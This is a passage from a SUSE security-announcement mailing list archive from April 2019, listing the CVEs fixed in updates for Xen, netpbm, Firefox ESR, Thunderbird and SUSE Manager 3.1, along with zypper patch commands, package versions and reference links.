CVE-2018-17963 CVE-2018-18438 CVE-2018-18849 CVE-2018-19665 CVE-2018-19961 CVE-2018-19962 CVE-2018-19965 CVE-2018-19966 CVE-2018-19967 CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that solves 14 vulnerabilities and has four fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - CVE-2018-19965: Fixed an issue related to the INVPCID instruction in case non-canonical addresses are accessed, which may allow a guest to cause Xen to crash, resulting in a Denial of Service (DoS) affecting the entire host. (XSA-279) (bsc#1115045) - CVE-2018-18849: Fixed an out of bounds memory access issue was found in the LSI53C895A SCSI Host Bus Adapter emulation while writing a message in lsi_do_msgin (bsc#1114423). - CVE-2018-19665: Fixed an integer overflow resulting in memory corruption in various Bluetooth functions, allowing this to crash qemu process resulting in Denial of Service (DoS). (bsc#1117756). - CVE-2018-18438: Fixed an integer overflow in ccid_card_vscard_read function which could allow memory corruption (bsc#1112188). - CVE-2018-17962: Fixed an integer overflow leading to a buffer overflow in the pcnet component (bsc#1111011) - CVE-2018-17963: Fixed an integer overflow in relation to large packet sizes, leading to a denial of service (DoS). (bsc#1111014) - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - CVE-2018-17958: Fixed an integer overflow which could lead to buffer overflow (bsc#1111007). - CVE-2018-10839: Fixed an integer overflow leading to a buffer overflow in the ne2000 component (bsc#1110924). - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - CVE-2018-19966: Fixed issue introduced by XSA-240 that could have caused conflicts with shadow paging (XSA-280)(bsc#1115047). - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS). (XSA-282) (bsc#1114988). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-xen-14011=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-xen-14011=1 Package List: - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): xen-kmp-default-4.2.5_21_3.0.101_0.47.106.59-45.30.1 xen-kmp-pae-4.2.5_21_3.0.101_0.47.106.59-45.30.1 xen-libs-4.2.5_21-45.30.1 xen-tools-domU-4.2.5_21-45.30.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 x86_64): xen-debuginfo-4.2.5_21-45.30.1 xen-debugsource-4.2.5_21-45.30.1 References: https://www.suse.com/security/cve/CVE-2018-10839.html https://www.suse.com/security/cve/CVE-2018-17958.html https://www.suse.com/security/cve/CVE-2018-17962.html https://www.suse.com/security/cve/CVE-2018-17963.html https://www.suse.com/security/cve/CVE-2018-18438.html https://www.suse.com/security/cve/CVE-2018-18849.html https://www.suse.com/security/cve/CVE-2018-19665.html https://www.suse.com/security/cve/CVE-2018-19961.html https://www.suse.com/security/cve/CVE-2018-19962.html https://www.suse.com/security/cve/CVE-2018-19965.html https://www.suse.com/security/cve/CVE-2018-19966.html https://www.suse.com/security/cve/CVE-2018-19967.html https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1110924 https://bugzilla.suse.com/1111007 https://bugzilla.suse.com/1111011 https://bugzilla.suse.com/1111014 https://bugzilla.suse.com/1112188 https://bugzilla.suse.com/1114423 https://bugzilla.suse.com/1114988 https://bugzilla.suse.com/1115040 https://bugzilla.suse.com/1115045 https://bugzilla.suse.com/1115047 https://bugzilla.suse.com/1117756 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Wed Apr 3 07:12:49 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 3 Apr 2019 15:12:49 +0200 (CEST) Subject: SUSE-SU-2019:0855-1: moderate: Security update for netpbm Message-ID: <20190403131249.8D716FEBC@maintenance.suse.de> SUSE Security Update: Security update for netpbm ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0855-1 Rating: moderate References: #1086777 Cross-References: CVE-2018-8975 Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for netpbm fixes the following issues: - CVE-2018-8975: The pm_mallocarray2 function allowed remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted image file (bsc#1086777). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-855=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-855=1 Package List: - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): libnetpbm-devel-10.80.1-3.3.36 netpbm-debuginfo-10.80.1-3.3.36 netpbm-debugsource-10.80.1-3.3.36 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libnetpbm11-10.80.1-3.3.36 libnetpbm11-debuginfo-10.80.1-3.3.36 netpbm-10.80.1-3.3.36 netpbm-debuginfo-10.80.1-3.3.36 netpbm-debugsource-10.80.1-3.3.36 References: https://www.suse.com/security/cve/CVE-2018-8975.html https://bugzilla.suse.com/1086777 From sle-security-updates at lists.suse.com Wed Apr 3 07:13:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 3 Apr 2019 15:13:31 +0200 (CEST) Subject: SUSE-SU-2019:0852-1: important: Security update for MozillaFirefox Message-ID: <20190403131331.0917BFEBC@maintenance.suse.de> SUSE Security Update: Security update for MozillaFirefox ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0852-1 Rating: important References: #1125330 #1127987 #1129821 #1130262 Cross-References: CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2019-5785 CVE-2019-9788 CVE-2019-9790 CVE-2019-9791 CVE-2019-9792 CVE-2019-9793 CVE-2019-9794 CVE-2019-9795 CVE-2019-9796 CVE-2019-9801 CVE-2019-9810 CVE-2019-9813 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes 15 vulnerabilities is now available. Description: This update for MozillaFirefox fixes the following issues: Security issuess addressed: - update to Firefox ESR 60.6.1 (bsc#1130262): - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information - Update to Firefox ESR 60.6 (bsc#1129821): - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file - CVE-2019-9801: Fixed an issue which could allow Windows programs to be exposed to web content - CVE-2019-9788: Fixed multiple memory safety bugs - CVE-2019-9790: Fixed a Use-after-free vulnerability when removing in-use DOM elements - CVE-2019-9791: Fixed an incorrect Type inference for constructors entered through on-stack replacement with IonMonkey - CVE-2019-9792: Fixed an issue where IonMonkey leaks JS_OPTIMIZED_OUT magic value to script - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre mitigations are disabled - CVE-2019-9794: Fixed an issue where command line arguments not discarded during execution - CVE-2019-9795: Fixed a Type-confusion vulnerability in IonMonkey JIT compiler - CVE-2019-9796: Fixed a Use-after-free vulnerability in SMIL animation controller - Update to Firefox ESR 60.5.1 (bsc#1125330): - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library which can occur when creating a path, leading to a potentially exploitable crash. - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia library which can occur after specific transform operations, leading to a potentially exploitable crash. - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library which can occur with Canvas 2D acceleration on macOS. This issue was addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this does not affect other versions and platforms where Canvas 2D acceleration is already disabled by default. Other issue addressed: - Fixed an issue with MozillaFirefox-translations-common which was causing error on update (bsc#1127987). Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/ Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/ Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-05/ Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-852=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-852=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-852=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-852=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-852=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-852=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-852=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-852=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-852=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-852=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-852=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-852=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-852=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-852=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 - SUSE Enterprise Storage 4 (x86_64): MozillaFirefox-60.6.1esr-109.63.2 MozillaFirefox-debuginfo-60.6.1esr-109.63.2 MozillaFirefox-debugsource-60.6.1esr-109.63.2 MozillaFirefox-devel-60.6.1esr-109.63.2 MozillaFirefox-translations-common-60.6.1esr-109.63.2 References: https://www.suse.com/security/cve/CVE-2018-18335.html https://www.suse.com/security/cve/CVE-2018-18356.html https://www.suse.com/security/cve/CVE-2018-18506.html https://www.suse.com/security/cve/CVE-2019-5785.html https://www.suse.com/security/cve/CVE-2019-9788.html https://www.suse.com/security/cve/CVE-2019-9790.html https://www.suse.com/security/cve/CVE-2019-9791.html https://www.suse.com/security/cve/CVE-2019-9792.html https://www.suse.com/security/cve/CVE-2019-9793.html https://www.suse.com/security/cve/CVE-2019-9794.html https://www.suse.com/security/cve/CVE-2019-9795.html https://www.suse.com/security/cve/CVE-2019-9796.html https://www.suse.com/security/cve/CVE-2019-9801.html https://www.suse.com/security/cve/CVE-2019-9810.html https://www.suse.com/security/cve/CVE-2019-9813.html https://bugzilla.suse.com/1125330 https://bugzilla.suse.com/1127987 https://bugzilla.suse.com/1129821 https://bugzilla.suse.com/1130262 From sle-security-updates at lists.suse.com Wed Apr 3 07:14:37 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 3 Apr 2019 15:14:37 +0200 (CEST) Subject: SUSE-SU-2019:0853-1: important: Security update for MozillaThunderbird Message-ID: <20190403131437.C5D96FEBC@maintenance.suse.de> SUSE Security Update: Security update for MozillaThunderbird ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0853-1 Rating: important References: #1125330 #1129821 #1130262 Cross-References: CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2018-18509 CVE-2019-5785 CVE-2019-9788 CVE-2019-9790 CVE-2019-9791 CVE-2019-9792 CVE-2019-9793 CVE-2019-9794 CVE-2019-9795 CVE-2019-9796 CVE-2019-9801 CVE-2019-9810 CVE-2019-9813 Affected Products: SUSE Linux Enterprise Workstation Extension 15 ______________________________________________________________________________ An update that fixes 16 vulnerabilities is now available. Description: This update for MozillaThunderbird to version 60.5.1 fixes the following issues: Security issues fixed: - Update to MozillaThunderbird 60.6.1 (bsc#1130262): - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information - Update to MozillaThunderbird 60.6 (bsc#1129821): - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file - CVE-2019-9801: Fixed an issue which could allow Windows programs to be exposed to web content - CVE-2019-9788: Fixed multiple memory safety bugs - CVE-2019-9790: Fixed a Use-after-free vulnerability when removing in-use DOM elements - CVE-2019-9791: Fixed an incorrect Type inference for constructors entered through on-stack replacement with IonMonkey - CVE-2019-9792: Fixed an issue where IonMonkey leaks JS_OPTIMIZED_OUT magic value to script - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre mitigations are disabled - CVE-2019-9794: Fixed an issue where command line arguments not discarded during execution - CVE-2019-9795: Fixed a Type-confusion vulnerability in IonMonkey JIT compiler - CVE-2019-9796: Fixed a Use-after-free vulnerability in SMIL animation controller - Update to MozillaThunderbird 60.5.1 (bsc#1125330): - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library which can occur when creating a path, leading to a potentially exploitable crash. - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia library which can occur after specific transform operations, leading to a potentially exploitable crash. - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library which can occur with Canvas 2D acceleration on macOS. This issue was addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this does not affect other versions and platforms where Canvas 2D acceleration is already disabled by default. - CVE-2018-18509: Fixed a flaw which during verification of certain S/MIME signatures showing mistakenly that emails bring a valid sugnature. Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/ https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/ https://www.mozilla.org/en-US/security/advisories/mfsa2019-06/ Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 15: zypper in -t patch SUSE-SLE-Product-WE-15-2019-853=1 Package List: - SUSE Linux Enterprise Workstation Extension 15 (x86_64): MozillaThunderbird-60.6.1-3.28.1 MozillaThunderbird-debuginfo-60.6.1-3.28.1 MozillaThunderbird-debugsource-60.6.1-3.28.1 MozillaThunderbird-translations-common-60.6.1-3.28.1 MozillaThunderbird-translations-other-60.6.1-3.28.1 References: https://www.suse.com/security/cve/CVE-2018-18335.html https://www.suse.com/security/cve/CVE-2018-18356.html https://www.suse.com/security/cve/CVE-2018-18506.html https://www.suse.com/security/cve/CVE-2018-18509.html https://www.suse.com/security/cve/CVE-2019-5785.html https://www.suse.com/security/cve/CVE-2019-9788.html https://www.suse.com/security/cve/CVE-2019-9790.html https://www.suse.com/security/cve/CVE-2019-9791.html https://www.suse.com/security/cve/CVE-2019-9792.html https://www.suse.com/security/cve/CVE-2019-9793.html https://www.suse.com/security/cve/CVE-2019-9794.html https://www.suse.com/security/cve/CVE-2019-9795.html https://www.suse.com/security/cve/CVE-2019-9796.html https://www.suse.com/security/cve/CVE-2019-9801.html https://www.suse.com/security/cve/CVE-2019-9810.html https://www.suse.com/security/cve/CVE-2019-9813.html https://bugzilla.suse.com/1125330 https://bugzilla.suse.com/1129821 https://bugzilla.suse.com/1130262 From sle-security-updates at lists.suse.com Wed Apr 3 16:09:39 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 4 Apr 2019 00:09:39 +0200 (CEST) Subject: SUSE-SU-2019:0863-1: moderate: Security update for several packages related to SUSE Manger 3.1 Message-ID: <20190403220939.D07E8FF2D@maintenance.suse.de> SUSE Security Update: Security update for several packages related to SUSE Manger 3.1 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0863-1 Rating: moderate References: #1109316 #1111191 #1111910 #1114029 #1114059 #1114157 #1114169 #1117759 #1119081 #1119964 #1121038 #1121195 #1121856 #1122836 #1123991 #1124639 #1126862 #1128781 #1129765 #1130658 Cross-References: CVE-2018-10851 CVE-2018-14626 CVE-2018-17197 Affected Products: SUSE Manager Server 3.1 SUSE Manager Proxy 3.1 ______________________________________________________________________________ An update that solves three vulnerabilities and has 17 fixes is now available. Description: This consolidated update includes multiple patchinfos for SUSE Manager Server and Proxy and follow security issues fixed: - CVE-2018-10851: Fixed denial of service via crafted zone record or crafted answer (bsc#1114157). - CVE-2018-14626: Fixed packet cache pollution via crafted query (bsc#1114169). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Server 3.1: zypper in -t patch SUSE-SUSE-Manager-Server-3.1-2019-863=1 - SUSE Manager Proxy 3.1: zypper in -t patch SUSE-SUSE-Manager-Proxy-3.1-2019-863=1 Package List: - SUSE Manager Server 3.1 (ppc64le s390x x86_64): spacewalk-branding-2.7.2.17-2.31.3 susemanager-3.1.19-2.34.2 susemanager-tools-3.1.19-2.34.2 - SUSE Manager Server 3.1 (noarch): cobbler-2.6.6-5.25.1 py26-compat-salt-2016.11.10-1.19.3 spacecmd-2.7.8.15-2.32.1 spacewalk-base-2.7.1.21-2.35.1 spacewalk-base-minimal-2.7.1.21-2.35.1 spacewalk-base-minimal-config-2.7.1.21-2.35.1 spacewalk-html-2.7.1.21-2.35.1 spacewalk-java-2.7.46.19-2.41.3 spacewalk-java-config-2.7.46.19-2.41.3 spacewalk-java-lib-2.7.46.19-2.41.3 spacewalk-java-oracle-2.7.46.19-2.41.3 spacewalk-java-postgresql-2.7.46.19-2.41.3 spacewalk-taskomatic-2.7.46.19-2.41.3 spacewalk-utils-2.7.10.11-2.23.3 subscription-matcher-0.22-4.9.2 susemanager-advanced-topics_en-pdf-3.1-10.29.4 susemanager-best-practices_en-pdf-3.1-10.29.4 susemanager-docs_en-3.1-10.29.4 susemanager-frontend-libs-3.1.2-3.10.1 susemanager-getting-started_en-pdf-3.1-10.29.4 susemanager-jsp_en-3.1-10.29.4 susemanager-reference_en-pdf-3.1-10.29.4 susemanager-schema-3.1.21-2.36.1 tika-core-1.20-1.6.2 - SUSE Manager Proxy 3.1 (noarch): spacewalk-base-minimal-2.7.1.21-2.35.1 spacewalk-base-minimal-config-2.7.1.21-2.35.1 References: https://www.suse.com/security/cve/CVE-2018-10851.html https://www.suse.com/security/cve/CVE-2018-14626.html https://www.suse.com/security/cve/CVE-2018-17197.html https://bugzilla.suse.com/1109316 https://bugzilla.suse.com/1111191 https://bugzilla.suse.com/1111910 https://bugzilla.suse.com/1114029 https://bugzilla.suse.com/1114059 https://bugzilla.suse.com/1114157 https://bugzilla.suse.com/1114169 https://bugzilla.suse.com/1117759 https://bugzilla.suse.com/1119081 https://bugzilla.suse.com/1119964 https://bugzilla.suse.com/1121038 https://bugzilla.suse.com/1121195 https://bugzilla.suse.com/1121856 https://bugzilla.suse.com/1122836 https://bugzilla.suse.com/1123991 https://bugzilla.suse.com/1124639 https://bugzilla.suse.com/1126862 https://bugzilla.suse.com/1128781 https://bugzilla.suse.com/1129765 https://bugzilla.suse.com/1130658 From sle-security-updates at lists.suse.com Wed Apr 3 16:13:45 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 4 Apr 2019 00:13:45 +0200 (CEST) Subject: SUSE-SU-2019:0863-1: moderate: Security update for SUSE Manager Server 3.1 Message-ID: <20190403221345.5AAE8FF2D@maintenance.suse.de> SUSE Security Update: Security update for SUSE Manager Server 3.1 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0863-1 Rating: moderate References: #1109316 #1111191 #1111910 #1114029 #1114059 #1114157 #1114169 #1117759 #1119081 #1119964 #1121038 #1121195 #1121856 #1122836 #1123991 #1124639 #1126862 #1128781 #1129765 #1130658 Cross-References: CVE-2018-10851 CVE-2018-14626 CVE-2018-17197 Affected Products: SUSE Manager Server 3.1 SUSE Manager Proxy 3.1 ______________________________________________________________________________ An update that solves three vulnerabilities and has 17 fixes is now available. Description: This update fixes the following issues: cobbler: - Fixes case where distribution detection returns None (bsc#1130658) - SUSE texmode fix (bsc#1109316) - Fix for SUSE distribution detection in ISO building (bsc#1123991) py26-compat-salt: - Remove arch from name when pkg.list_pkgs is called with 'attr' (bsc#1114029) spacecmd: - Fix importing state channels using configchannel_import - Fix getting file info for latest revision (via configchannel_filedetails) spacewalk-branding: - Update jquery.timepicker dependency to 1.11.14 to allow parsing the time format without depending on the language. (bsc#1119081) spacewalk-java: - Fix a problem when cloning public child channels with a private base channel (bsc#1124639) - Keep assigned channels on traditional to minion migration (bsc#1122836) - Fix "Add Selected to SSM" on System Groups -> systems page (bsc#1121856) - Disable notification types with 'java.notifications_type_disabled' in rhn.conf (bsc#1111910) - XMLRPC API: Include init.sls in channel file list (bsc#1111191) - Fix the config channels assignment via SSM (bsc#1117759) spacewalk-utils: - Create /etc/rhn with correct ownership to prevent file conflicts spacewalk-web: - Fix action scheduler time picker prefill when the server is on "UTC/GMT" timezone (bsc#1121195) - Fix initializing of the datetime picker (bsc#1126862) - Show feedback messages after using the retry option on the notification messages page subscription-matcher: - Old style hard bundle merging fix (bsc#1114059) susemanager: - Fix creation of bootstrap repositories for SLE12 (no SP) by requiring python-setuptools only for SLE12 >= SP1 (bsc#1129765) - Add `python-setuptools` package dependency to SLES12 bootstrap repo (bsc#1119964) - Rhnlib was renamed to python2-rhnlib. Change bootstrap data accordingly. susemanager-schema: - Fix performance regression in inter-server-sync (bsc#1128781) susemanager-docs_en: - Update text and image files - 2.1 comparison: clarify profile syncing support - Adjust documentation about notification settings - Fix internal link (SMT documentation). - Remove documentation about the "mgr-sync enable-scc" subcommand. This subcommand is no longer available. susemanager-frontend-libs: - Update jquery.timepicker to 1.11.14 (bsc#1119081) tika-core: - New upstream version (1.20). Fixes infinite loop in SQLite3Parser (CVE-2018-17197) (bsc#1121038) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Server 3.1: zypper in -t patch SUSE-SUSE-Manager-Server-3.1-2019-863=1 - SUSE Manager Proxy 3.1: zypper in -t patch SUSE-SUSE-Manager-Proxy-3.1-2019-863=1 Package List: - SUSE Manager Server 3.1 (ppc64le s390x x86_64): spacewalk-branding-2.7.2.17-2.31.3 susemanager-3.1.19-2.34.2 susemanager-tools-3.1.19-2.34.2 - SUSE Manager Server 3.1 (noarch): cobbler-2.6.6-5.25.1 py26-compat-salt-2016.11.10-1.19.3 spacecmd-2.7.8.15-2.32.1 spacewalk-base-2.7.1.21-2.35.1 spacewalk-base-minimal-2.7.1.21-2.35.1 spacewalk-base-minimal-config-2.7.1.21-2.35.1 spacewalk-html-2.7.1.21-2.35.1 spacewalk-java-2.7.46.19-2.41.3 spacewalk-java-config-2.7.46.19-2.41.3 spacewalk-java-lib-2.7.46.19-2.41.3 spacewalk-java-oracle-2.7.46.19-2.41.3 spacewalk-java-postgresql-2.7.46.19-2.41.3 spacewalk-taskomatic-2.7.46.19-2.41.3 spacewalk-utils-2.7.10.11-2.23.3 subscription-matcher-0.22-4.9.2 susemanager-advanced-topics_en-pdf-3.1-10.29.4 susemanager-best-practices_en-pdf-3.1-10.29.4 susemanager-docs_en-3.1-10.29.4 susemanager-frontend-libs-3.1.2-3.10.1 susemanager-getting-started_en-pdf-3.1-10.29.4 susemanager-jsp_en-3.1-10.29.4 susemanager-reference_en-pdf-3.1-10.29.4 susemanager-schema-3.1.21-2.36.1 tika-core-1.20-1.6.2 - SUSE Manager Proxy 3.1 (noarch): spacewalk-base-minimal-2.7.1.21-2.35.1 spacewalk-base-minimal-config-2.7.1.21-2.35.1 References: https://www.suse.com/security/cve/CVE-2018-10851.html https://www.suse.com/security/cve/CVE-2018-14626.html https://www.suse.com/security/cve/CVE-2018-17197.html https://bugzilla.suse.com/1109316 https://bugzilla.suse.com/1111191 https://bugzilla.suse.com/1111910 https://bugzilla.suse.com/1114029 https://bugzilla.suse.com/1114059 https://bugzilla.suse.com/1114157 https://bugzilla.suse.com/1114169 https://bugzilla.suse.com/1117759 